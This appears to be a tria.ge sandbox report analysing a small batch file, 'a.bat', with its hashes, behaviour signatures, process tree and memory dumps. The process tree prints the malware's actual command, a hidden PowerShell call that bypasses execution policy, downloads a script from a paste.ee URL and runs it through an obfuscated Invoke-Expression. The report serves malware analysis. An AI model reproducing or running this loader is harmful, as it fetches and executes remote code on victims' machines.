Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

a.bat

windows7-x64

6

a.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    01/03/2025, 15:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a.bat

  • Size

    156B

  • MD5

    a4b2a54bebc39707a69977648a7a2b4f

  • SHA1

    c27b1203244796cc064b00c472cec23cd16760ce

  • SHA256

    5c14590059c2133806d881fa853b627b73748a20e529afaf4c7aa2a5fce97eb3

  • SHA512

    669f71ff4b75184341eec4a1d78556b2e95ffecf8f14ac6a0467d8169e8bf5b991af443f5dd1786fbef244d483cebb10400374bed3a11ada805040c4f4eb32c1

Score
6/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\a.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -w h -ExecutionPolicy Bypass -Command "(I'w'r('https://paste.ee/r/CLsmPBQU/0') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex');"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3056

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3056-4-0x000007FEF621E000-0x000007FEF621F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3056-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3056-9-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-8-0x0000000002AD4000-0x0000000002AD7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/3056-7-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3056-10-0x000007FEF5F60000-0x000007FEF68FD000-memory.dmp

    Filesize

    9.6MB

    Download